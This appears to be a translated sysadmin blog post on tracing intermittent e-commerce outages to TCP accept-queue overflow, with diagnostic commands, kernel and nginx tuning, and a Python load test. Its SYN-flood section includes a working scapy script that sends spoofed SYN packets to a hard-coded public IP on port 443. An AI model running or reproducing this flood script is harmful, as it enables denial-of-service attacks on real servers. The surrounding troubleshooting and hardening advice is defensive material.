Problem Description

The monitoring system found that the homepage and other pages of the e-commerce website were intermittently inaccessible. Security protection, network traffic, and application system load all looked normal. Restarting the system resolved the problem temporarily, but after a while the intermittent failures reappeared. By this point the problem was affecting normal business across the entire site.

I was shocked. Worst of all, the alarm system had not raised a single alarm and every service appeared to be running normally; I broke into a sweat on the spot. Still, we had to stay calm, search carefully for clues, and track the problem down step by step.

Preliminary judgment

1. Check the dev and network card device layer for errors and drops, to determine whether the hardware and system layers are abnormal. Commands: cat /proc/net/dev and ifconfig.

2. Observe socket overflows and socket drops (if the application processes the socket queue too slowly, the queue overflows and incoming SYNs are affected as well). Command: netstat -s | grep -i listen. Result: the SYN socket overflow and socket dropped counters were increasing.

3. Check the sysctl kernel parameters (backlog, somaxconn, file-max) and the application backlog. In the output of ss -lnt, Send-Q shows the minimum of these values. Result: at the time, the queues on port 80 and port 443 had exceeded their default limits.

4. Check whether selinux and NetworkManager are enabled; disabling them is recommended.

5. Check whether timestamps, reuse, and kernel recycle are enabled; if traffic passes through NAT, disable recycle.

6. Capture packets to determine whether requests actually reach the application for processing, or whether SYNs are received but never answered.

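The socket overflow check above can also be scripted, so that the counters can be sampled repeatedly. The following is a minimal sketch, assuming a Linux host where /proc/net/netstat exposes the TcpExt counters ListenOverflows and ListenDrops (the values that netstat -s reports as listen queue overflows and dropped SYNs). The function names parse_tcpext and listen_counters are made up for this illustration.

```python
def parse_tcpext(text):
    """Parse the TcpExt header/value line pair from /proc/net/netstat text."""
    # The file holds pairs of lines: one with counter names, one with values.
    rows = [ln.split() for ln in text.splitlines() if ln.startswith("TcpExt:")]
    if len(rows) < 2:
        return {}
    names, values = rows[0][1:], rows[1][1:]
    return {name: int(value) for name, value in zip(names, values)}


def listen_counters(text):
    """Return only the two accept-queue related counters (0 if missing)."""
    counters = parse_tcpext(text)
    return {key: counters.get(key, 0) for key in ("ListenOverflows", "ListenDrops")}
```

On a Linux server, calling listen_counters(open("/proc/net/netstat").read()) twice, a few seconds apart, and comparing the results shows whether the overflow counters are still growing.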
In-depth analysis of the problem

The normal TCP three-way handshake:

Step 1: the client sends a SYN to the server to initiate the handshake.

Step 2: after receiving the SYN, the server returns SYN+ACK to the client.

Step 3: after receiving the SYN+ACK, the client replies to the server with an ACK, telling the server that it has received the SYN+ACK.

Judging from the symptoms, the full connection queue (accept queue) was full while TCP connections were being established. Checking the counters several times showed that overflowed kept increasing, so it was clear that the full connection queue on the server was overflowing.

Next, check how the OS behaves after an overflow:

    # cat /proc/sys/net/ipv4/tcp_abort_on_overflow
    0

With tcp_abort_on_overflow set to 0, if the full connection queue is full at the third step of the three-way handshake, the server discards the ACK sent by the client (on the server side, the connection is not yet established).

To prove that the exceptions in the client application were related to the full connection queue being full, I first changed tcp_abort_on_overflow to 1. A value of 1 means that if the full connection queue is full at the third step, the server sends a reset packet to the client, aborting the handshake and the connection (which was never actually established on the server side). After testing again, the web service log showed many connection reset by peer errors, which proves that the client errors were caused by this.

Check the sysctl kernel parameters (backlog, somaxconn, file-max) and the backlog configuration parameter of nginx. ss -ln shows the minimum of these values, which was 128. Recv-Q had already reached 129, so new requests were being discarded.

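The comparison of Recv-Q against Send-Q can be automated. On Linux, the accept queue limit of a listening socket is the smaller of net.core.somaxconn and the backlog the application passes to listen(), and ss -lnt reports that limit in the Send-Q column. The sketch below is only an illustration under those assumptions: the helper names are hypothetical, the parser expects the usual ss -lnt column order (State, Recv-Q, Send-Q, Local Address:Port), and treating Recv-Q >= Send-Q as "saturated" is a threshold chosen for this example.

```python
def effective_backlog(somaxconn, app_backlog):
    """Accept queue limit: the smaller of the kernel cap and the listen() backlog."""
    return min(somaxconn, app_backlog)


def saturated_listeners(ss_output):
    """Return (local_address, recv_q, send_q) for LISTEN sockets at or over their limit."""
    hits = []
    for line in ss_output.splitlines():
        fields = line.split()
        # Skip the header line and anything that is not a listening socket.
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        recv_q, send_q = int(fields[1]), int(fields[2])
        if send_q > 0 and recv_q >= send_q:
            hits.append((fields[3], recv_q, send_q))
    return hits
```

Feeding it the text printed by ss -lnt would have flagged the listener from this incident, where Recv-Q was 129 against a limit of 128.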
Modify the above parameters and optimize them

Linux kernel parameter optimization:

    net.ipv4.tcp_syncookies = 1
    net.ipv4.tcp_max_syn_backlog = 16384
    net.core.somaxconn = 16384

Nginx configuration parameter optimization:

    backlog=32768;

A multithreaded Python test found no new problems:

    import requests
    from urllib.parse import urljoin
    from bs4 import BeautifulSoup
    from concurrent.futures import ThreadPoolExecutor, as_completed

    url = 'https://'  # the site URL is left elided, as in the original
    response = requests.get(url)
    soup = BeautifulSoup(response.text, 'html.parser')

    # Request every link on the page concurrently with 20 worker threads.
    with ThreadPoolExecutor(20) as ex:
        futures = [ex.submit(requests.get, urljoin(url, each_a_tag['href']))
                   for each_a_tag in soup.find_all('a', href=True)]
        for future in as_completed(futures):
            try:
                future.result()  # re-raises any error from the worker thread
            except Exception as err:
                print('return error msg:' + str(err))

Understand the process and queues of establishing a connection during the TCP handshake

As shown in the figure above, there are two queues: the SYN queue (semi-connection queue) and the accept queue (full connection queue).

In the three-way handshake, after the server receives the client's SYN in the first step, it puts the relevant information into the semi-connection queue and returns SYN+ACK to the client (the second step).

In the third step, the server receives the client's ACK. If the full connection queue is not full at this point, the relevant information is moved from the semi-connection queue into the full connection queue; otherwise the server acts as specified by tcp_abort_on_overflow.

If the full connection queue is full and tcp_abort_on_overflow is 0, the server resends SYN+ACK to the client after a while (that is, it repeats the second step of the handshake). If the client's timeout is relatively short, the client can easily run into an exception.

SYN Flood Attack

SYN flood is one of the most popular methods for DoS (Denial of Service) and DDoS (Distributed Denial of Service) attacks.
A SYN flood exploits a weakness in the TCP protocol by creating "semi-connections". The attacked server ends up holding a large number of connections in the SYN_RECV state and, by default, retries the second handshake packet 5 times for each of them. This fills the TCP queue of pending connections and exhausts resources (CPU saturated or memory short), so that normal service requests cannot get in.

    import random
    from concurrent.futures import ThreadPoolExecutor
    from scapy.all import *

    def synFlood(tgt, dPort):
        # Spoofed source addresses; one is picked at random for each packet.
        srcList = ['11.1.1.2', '22.1.1.102', '33.1.1.2', '125.130.5.199']
        for sPort in range(1024, 65535):
            index = random.randrange(4)
            ipLayer = IP(src=srcList[index], dst=tgt)
            tcpLayer = TCP(sport=sPort, dport=dPort, flags='S')
            packet = ipLayer / tcpLayer
            send(packet)

    # Target host and port.
    tgt = '139.196.251.198'
    print(tgt)
    dPort = 443
    with ThreadPoolExecutor(10000000) as ex:
        try:
            # Pass the function and its arguments; result() surfaces worker errors.
            ex.submit(synFlood, tgt, dPort).result()
        except Exception as err:
            print('return error msg:' + str(err))

In summary, the TCP semi-connection queue and full connection queue are easily overlooked, yet they are critical, especially for applications that use short-lived connections. When this kind of problem occurs, network traffic, CPU, threads, and load all look relatively normal. On the client side the rt (response time) is relatively high, but measured on the server side the rt is very short.

How to avoid panicking when problems arise, and how to establish an emergency mechanism, are topics I will write about in a follow-up article when I get the chance.
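To make the "5 retries by default" figure from the SYN flood discussion more concrete, the following sketch works out how long a single half-open connection can stay in SYN_RECV. It assumes an initial retransmission timeout of 1 second that doubles after every retry, with no upper cap applied; the function name synack_schedule and its parameters are made up for this illustration, and real kernels may differ in detail.

```python
def synack_schedule(retries=5, initial_rto=1.0):
    """Return (retransmit_times, give_up_time) in seconds after the first SYN+ACK.

    Assumes simple exponential backoff: the timeout doubles after each retry.
    """
    times = []
    elapsed = 0.0
    rto = initial_rto
    for _ in range(retries):
        elapsed += rto          # wait one timeout, then retransmit SYN+ACK
        times.append(elapsed)
        rto *= 2                # back off before the next attempt
    # After the last retransmission the server waits one more timeout, then gives up.
    return times, elapsed + rto


times, give_up = synack_schedule()
print(times, give_up)
```

Under these assumptions the retransmissions go out 1, 3, 7, 15, and 31 seconds after the first SYN+ACK, and the entry is dropped after 63 seconds. Each spoofed SYN can therefore occupy a slot in the semi-connection queue for about a minute, which is why a modest packet rate is enough to fill it.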